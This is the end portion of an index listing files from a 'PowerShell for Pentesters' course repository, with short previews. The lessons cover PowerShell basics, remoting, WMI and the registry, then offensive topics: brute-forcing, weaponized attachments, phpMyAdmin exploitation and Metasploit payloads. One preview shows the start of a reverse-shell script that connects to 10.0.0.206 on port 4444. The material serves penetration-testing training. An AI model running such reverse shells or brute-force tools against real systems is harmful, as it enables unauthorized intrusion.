"preview": "#### 11. Basics of Powershell Scripting\n\n###### PowerShell Scripting\r\r- Write, Save, Execute\n- Execution Policy is ```NO"
},
{
"path": "12-Functions-in-Powershell-Part-1.md",
"chars": 1291,
"preview": "#### 12. Functions in Powershell Part 1\n\n###### Functions\n\r- Simple usage\n\n```PowerShell\nPS C:\\Users\\Windows-32\\Desktop>"
},
{
"path": "13-Functions-in-Powershell-Part-2.md",
"chars": 881,
"preview": "#### 13. Functions in Powershell Part 2\n\n- Dynamic number of Parameters\n\n```PowerShell\nPS C:\\Users\\Windows-32> function "
},
{
"path": "14-Functions-in-Powershell-Part-3.md",
"chars": 4280,
"preview": "#### 14. Functions in Powershell Part 3\n\n- Switch Parameters\n\n```PowerShell\nPS C:\\Users\\Windows-32> function switchable "
},
{
"path": "15-Advanced-Functions-in-Powershell.md",
"chars": 1971,
"preview": "#### 15. Advanced Functions in Powershell\r\n\r\n###### Advanced Functions\r\n- param statement\r\n- Parameter attributes\r\n -"
},
{
"path": "16-Advanced-Scripting-with-Powershell.md",
"chars": 1258,
"preview": "#### 16. Advanced Scripting with Powershell\n\n###### PowerShell Scripting\n\n- Dot sourcing\n- CmdletBinding\n - Verbose O"
},
{
"path": "17-Module-in-Powershell-Part-1.md",
"chars": 62055,
"preview": "#### 17. Module in Powershell Part 1\r\n\r\n###### Modules\r\n\r\n- Help topic for ```module```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Wi"
},
{
"path": "18-Modules-in-Powershell-Part-2.md",
"chars": 7560,
"preview": "#### 18. Modules in Powershell Part 2\r\n\r\n###### Writing Modules\r\n\r\n```Show-AdvancedScript.psm1```\r\n\r\n```PowerShell\r\nfunc"
},
{
"path": "19-Modules-in-Powershell-Part-3.md",
"chars": 4549,
"preview": "#### 19. Modules in Powershell Part 3\n\n###### Manifest Modules\n\n```Show-AdvancedScript.psd1```\n\n```PowerShell\n#\n# Module"
},
{
"path": "2-Introduction-to-Powershell.md",
"chars": 126745,
"preview": "#### 2. Introduction to Powershell\n\n###### [PowerShell](https://technet.microsoft.com/en-us/library/bb978526.aspx)\n\n- Wi"
},
{
"path": "20-Remoting-Part-1.md",
"chars": 26994,
"preview": "#### 20. Remoting Part 1\n\n###### Running Cmdlets on remote computers\n\n- Help topics for ```Remoting```\n\n```PowerShell\nPS"
},
{
"path": "21-Remoting-Part-2.md",
"chars": 13399,
"preview": "#### 21. Remoting Part 2\n\n###### PowerShell Remoting\n\n- Based on ```WSMAN``` Protocol and uses ```WinRM```\r - Needs p"
},
{
"path": "22-Powershell-Remoting-Part-3.md",
"chars": 20853,
"preview": "#### 22. Powershell Remoting Part 3\n\n###### PowerShell Remoting – One-to-One\n\n- Interactive Session - ```PSSession```\n "
},
{
"path": "23-Powershell-Remoting-Part-4.md",
"chars": 112033,
"preview": "#### 23. Powershell Remoting Part 4\n\n###### PowerShell Remoting – One-to-Many\n\n- ```Invoke-Command```\n\n - Running ```"
},
{
"path": "24-Powershell-Remoting-Part-5.md",
"chars": 10520,
"preview": "#### 24. Powershell Remoting Part 5\n\n#### Advanced PowerShell Remoting\n\r- Using ```Invoke-Command``` ```state-fully``` a"
},
{
"path": "25-Powershell-Remoting-Part-6.md",
"chars": 3572,
"preview": "#### 25. Powershell Remoting Part 6\n\n###### The Double Hop Problem\n\n\n\n- ```Target 1``` - `"
},
{
"path": "26-Jobs-in-Powershell.md",
"chars": 32638,
"preview": "#### 26. Jobs in Powershell\n\n###### Jobs\n\n- ```Help``` system for ```job```\n\n```PowerShell\nPS C:\\Users\\Administrator> he"
},
{
"path": "27-Using-NET-in-Powershell-Part-1.md",
"chars": 6008,
"preview": "#### 27. Using .NET in Powershell Part 1\n\n- Loaded ```assemblies``` in ```Powershell``` session\n\n```PowerShell\nPS C:\\> ["
},
{
"path": "28-Using-NET-in-Powershell-Part-2.md",
"chars": 23702,
"preview": "#### 28. Using .NET in Powershell Part 2\n\n###### System.Windows.Forms\n\n- ```Add-Type``` Cmdlet with ```AssemblyName``` `"
},
{
"path": "29-Using-NET-in-Powershell-Part-3.md",
"chars": 700,
"preview": "#### 29. Using .NET in Powershell Part 3\n\n\n###### Add-Type\r\r- Use ```Add-Type``` with ```-FromSource```\n- ```New-Object`"
},
{
"path": "3-Exploring-and-using-Cmdlets.md",
"chars": 120882,
"preview": "#### 3. Exploring and using Cmdlets\n\n- ```Get-Help``` for ```Get-Command``` Cmdlets\n\n```Powershell\nPS C:\\Users\\Windows-3"
},
{
"path": "30-Using-NET-in-Powershell-Part-4.md",
"chars": 19381,
"preview": "#### 30. Using .NET in Powershell Part 4\r\n\r\n###### Add-Type\r\n\r\n- Use ```Add-Type``` with ```-FromPath``` \r\n\r\n```Invoke-S"
},
{
"path": "31-Using-NET-in-Powershell-Part-5.md",
"chars": 1041,
"preview": "#### 31. Using .NET in Powershell Part 5\n\n###### Add-Type\n\r- Use ```Add-Type``` with ```-MemberDefinition```\n- Making ``"
},
{
"path": "32-Using-WMI-in-Powershell-Part-1.md",
"chars": 318932,
"preview": "#### 32. Using WMI in Powershell Part 1\n\n###### [WMI](http://searchwindowsserver.techtarget.com/definition/Windows-Manag"
},
{
"path": "33-Using-WMI-in-Powershell-Part-2.md",
"chars": 230248,
"preview": "#### 33. Using WMI in Powershell Part 2\n\n- Using ```Get-WmiObject``` - ```Local```\n\n```PowerShell\nPS C:\\Users\\Administra"
},
{
"path": "34-Using-WMI-in-Powershell-Part-3.md",
"chars": 16057,
"preview": "#### 34. Using WMI in Powershell Part 3\n\n- Explore ```Methods``` of a ```Class```\n\n```PowerShell\nPS C:\\Users\\Administrat"
},
{
"path": "35-COM-and-Powershell.md",
"chars": 53915,
"preview": "#### 35. COM and Powershell\n\n###### Exploring COM objects\n\n```COM Objects``` are ```interfaces``` to various ```Windows "
},
{
"path": "36-Registry-and-Powershell-Part-1.md",
"chars": 42570,
"preview": "#### 36. Registry and Powershell Part 1\n\n###### Reading Windows Registry\n\n- Registry Provider\n\n```PowerShell\nPS C:\\> Get"
},
{
"path": "37-Registry-and-Powershell-Part-2.md",
"chars": 3409,
"preview": "#### 37. Registry and Powershell Part 2\n\n- ```Get-PSProvider```\n\n```PowerShell\nPS C:\\> Get-PSProvider\n\nName "
},
{
"path": "38-Registry-and-Powershell-Part-3.md",
"chars": 94129,
"preview": "#### 38. Registry and Powershell Part 3\n\n###### Windows Registry on Remote Computer\n\n###### Ways of access Registry on a"
},
{
"path": "39-Pentest-Methodology.md",
"chars": 1251,
"preview": "#### 39. Pentest Methodology\n\n###### Penetration Testing is cyclic\n\n\n\n####"
},
{
"path": "4-Output-Formatting.md",
"chars": 20369,
"preview": "#### 4. Output Formatting\n\n###### Output Formatting\n\n```PowerShell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdl"
},
{
"path": "40-Recon-and-Scanning-Part-1.md",
"chars": 36754,
"preview": "#### 40. Recon and Scanning Part 1\n\n###### Recon and Scanning\n\n- Host Discovery\n- Port-Scan\n- Other Recon methods\n\n#####"
},
{
"path": "41-Recon-and-Scanning-Part-2.md",
"chars": 14223,
"preview": "#### 41. Recon and Scanning Part 2\n\n###### [Posh-Shodan](https://github.com/darkoperator/Posh-Shodan)\n\n- Import [```Posh"
},
{
"path": "42-Vulnerability-Scanning-and-Analysis.md",
"chars": 169803,
"preview": "#### 42. Vulnerability Scanning and Analysis\n\n###### Vulnerability Scanning and Analysis\n\r- Automating ```nmap``` and ``"
},
{
"path": "43-Bruteforce-Part-1.md",
"chars": 8974,
"preview": "#### 43. Bruteforce Part 1\n\n###### Brute-Forcing\n\n- Brute-Force in Nishang:\n - Active Directory\n - FTP\n - MSSQL"
},
{
"path": "44-Bruteforce-Part-2.md",
"chars": 2131,
"preview": "#### 44. Bruteforce Part 2\n\n###### Brute Forcing\n\r- [```Get-WinRMPassword```](https://poshsecurity.com/blog/2014/3/20/po"
},
{
"path": "45-Exploitation-Executing-Scripts-on-MySQL.md",
"chars": 2366,
"preview": "#### 45. Exploitation: Executing Scripts on MySQL\n\n###### Install SQL Server\n\n- [SQL Server 2012 - Installation step by "
},
{
"path": "46-Client-Side-Attacks-Part-1.md",
"chars": 8487,
"preview": "#### 46. Client Side Attacks Part 1\n\n###### Client Side Attacks\r\r- Malicious/Weaponized Attachments\n - Out-Word\n -"
},
{
"path": "47-Client-Side-Attacks-Part-2.md",
"chars": 16686,
"preview": "#### 47. Client Side Attacks Part 2\n\n###### Malicious/Weaponized Attachments\n\n- Out-CHM\n- Out-Shortcut\n\n - Out-CHM\n\n\t"
},
{
"path": "48-Client-Side-Attacks-Part-3.md",
"chars": 8916,
"preview": "#### 48. Client Side Attacks Part 3\n\n###### Phishing/Drive-by-download\n\n- Out-HTA\n- Out-Java\n\n - Out-HTA\n\n\t```PowerSh"
},
{
"path": "49-Client-Side-Attacks-Part-4.md",
"chars": 12135,
"preview": "#### 49. Client Side Attacks Part 4\n\n###### Using Modules\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-maste"
},
{
"path": "5-Operators.md",
"chars": 4025,
"preview": "#### 5. Operators\r\n\r\n- Arithmetic (```+, -, *, /, %```)\r\n\r\n```PowerShell\r\nPS C:\\Users\\Windows-32> 4+7\r\n11\r\nPS C:\\Users\\W"
},
{
"path": "50-PHPMyAdmin-Part-1.md",
"chars": 1116,
"preview": "#### 50. PHPMyAdmin Part 1\n\n###### Exploitation – phpMyAdmin\n\n- Assumptions\n\n - Username / Password of phpMyAdmin is "
},
{
"path": "51-PHPMyAdmin-Part-2.md",
"chars": 19840,
"preview": "#### 51. PHPMyAdmin Part 2\n\n- Identify the ```plugin directory```\n\n```\nSELECT @@plugin_dir\n```\n\n- Convert the ```DLL``` "
},
{
"path": "52-Metasploit-Part-1.md",
"chars": 6779,
"preview": "#### 52. Metasploit Part 1\n\n- PowerShell payload formats\n\n\t- psh\n\t- psh-cmd\n\t- psh-net\n\t- psh-reflection\n\n```sh\nroot@kal"
},
{
"path": "53-Metasploit-Part-2.md",
"chars": 20716,
"preview": "#### 53. Metasploit Part 2\n\n###### Manually executing scripts and modules\n\n- Upload a script\r- Use download and execute "
},
{
"path": "6-Advanced-Operators.md",
"chars": 1107,
"preview": "#### 6. Advanced Operators\n\n- Logical (```-and, -or, -xor, -not, !```)\n\n```PowerShell\nPS C:\\Users\\Windows-32> (1 -le 6) "
},
{
"path": "7-Types-in-Powershell.md",
"chars": 1793,
"preview": "#### 7. Types in Powershell\n\n- ```Dynamic Types``` - Not strictly typed\n\n```PowerShell\nPS C:\\Users\\Windows-32> $value = "
},
{
"path": "8-Arrays-in-Powershell.md",
"chars": 3067,
"preview": "#### 8. Arrays in Powershell\n\n- Type conversion in PowerShell is done with the help of cast ```[ ]``` operator\n\n```Power"
},
{
"path": "9-Conditional-Statements-in-Powershell.md",
"chars": 1306,
"preview": "#### 9. Conditional Statements in Powershell\r\n\r\n###### If Conditional Statement\r\n\r\n- If, elseif, else\r\n- Supports usage "
},
{
"path": "Code/11/HelloWorld.ps1",
"chars": 13,
"preview": "\"Hello World\""
},
{
"path": "Code/15/paramatrributes.ps1",
"chars": 352,
"preview": "function paramattributes \r\n{\r\n\r\n param (\r\n [Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True, "
},
{
"path": "Code/16/Show-AdvancedScript.ps1",
"chars": 304,
"preview": "function Show-AdvancedScript\r\n{\r\n [CmdletBinding( SupportsShouldProcess = $True)]\r\n param(\r\n [Parameter()]\r\n "
},
{
"path": "Code/18/Check-PassTheHash.psm1",
"chars": 515,
"preview": "function Check-PassTheHash\n{\n $hotfixes = \"KB2871997\"\n #checks the computer it's run on if any of the listed hotfi"
},
{
"path": "Code/18/Show-AdvancedScript.psm1",
"chars": 492,
"preview": "function Show-AdvancedScript\r\n{\r\n [CmdletBinding( SupportsShouldProcess = $True)]\r\n param(\r\n [Parameter()]\r\n "
},
{
"path": "Code/23/Search-Sensitive.ps1",
"chars": 242,
"preview": "$file = Get-ChildItem -Path C:\\ -Filter *.txt -Recurse\r\n\r\nWrite-Output \"`nFiles Found \" --------------------- $file.Cou"
},
{
"path": "Code/29/Invoke-SysCommands.ps1",
"chars": 489,
"preview": "$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n\r\n public static void lookup(string domainname)\r\n {\r\n Syste"
},
{
"path": "Code/30/Invoke-SysCommandsDLL.ps1",
"chars": 874,
"preview": "$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n public static void lookup (string domainname)\r\n {\r\n System"
},
{
"path": "Code/31/New-SymLink.ps1",
"chars": 318,
"preview": "$ApiCode = @\"\r\n\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern bool CreateSymbolicLink(string lpSymlinkFileName, st"
},
{
"path": "Code/35/Ie-Com.ps1",
"chars": 147,
"preview": "$url = \"http://www.google.com\"\r\n\r\n$ie_o = New-Object -ComObject InternetExplorer.Application.1\r\n\r\n$ie_o.visible = $Fals"
},
{
"path": "Code/41/Get-DefaultPage.ps1",
"chars": 242,
"preview": "$reader = [System.IO.File]::OpenText(\"C:\\Users\\Administrator\\Desktop\\Code\\41\\ip.txt\")\r\n\r\nwhile($null -ne ($line = $read"
},
{
"path": "Code/41/ip.txt",
"chars": 70,
"preview": "10.0.0.1\r\n31.13.77.36\r\n204.79.197.203\r\n216.58.194.164\r\n192.185.165.194"
},
{
"path": "Code/42/Start-AutoNmap.ps1",
"chars": 253,
"preview": "$outputpath = \"C:\\Users\\Administrator\\Desktop\"\r\n$IPRanges = \"10.0.0.1/24\"\r\nforeach ($range in $IPRanges)\r\n{\r\n $temp "
},
{
"path": "Code/44/Get-WinRMPassword.ps1",
"chars": 3485,
"preview": "Function Get-WinRMPassword {\r\n<#\r\n.SYNOPSIS\r\nSimple bruteforce attack upon a Windows machine running WinRM\r\n\r\n.DESCRIPTI"
},
{
"path": "Code/47/mini-reverse.ps1",
"chars": 1724,
"preview": "$socket = new-object System.Net.Sockets.TcpClient('10.0.0.206', 4444);\nif($socket -eq $null){exit 1}\n$stream = $socket.G"
},
{
"path": "Code/49/Out-ShortcutModified.ps1",
"chars": 1549,
"preview": "function Out-Shortcut\n{\n\n [CmdletBinding()] Param(\n \n [Parameter(Position = 0, Mandatory = $False)]\n "
},
{
"path": "Code/51/Convert-Dll.ps1",
"chars": 864,
"preview": "function Convert-Dll\r\n{\r\n<#\r\n.SYNOPSIS\r\nNishang script to convert an executable to text file.\r\n\r\n.DESCRIPTION\r\nThis scr"
},
{
"path": "README.md",
"chars": 60,
"preview": "# PowerShell-for-Pentesters\nPowerShell for Pentesters Notes\n"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the d1pakda5/PowerShell-for-Pentesters GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 74 files (1.7 MB), approximately 420.2k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.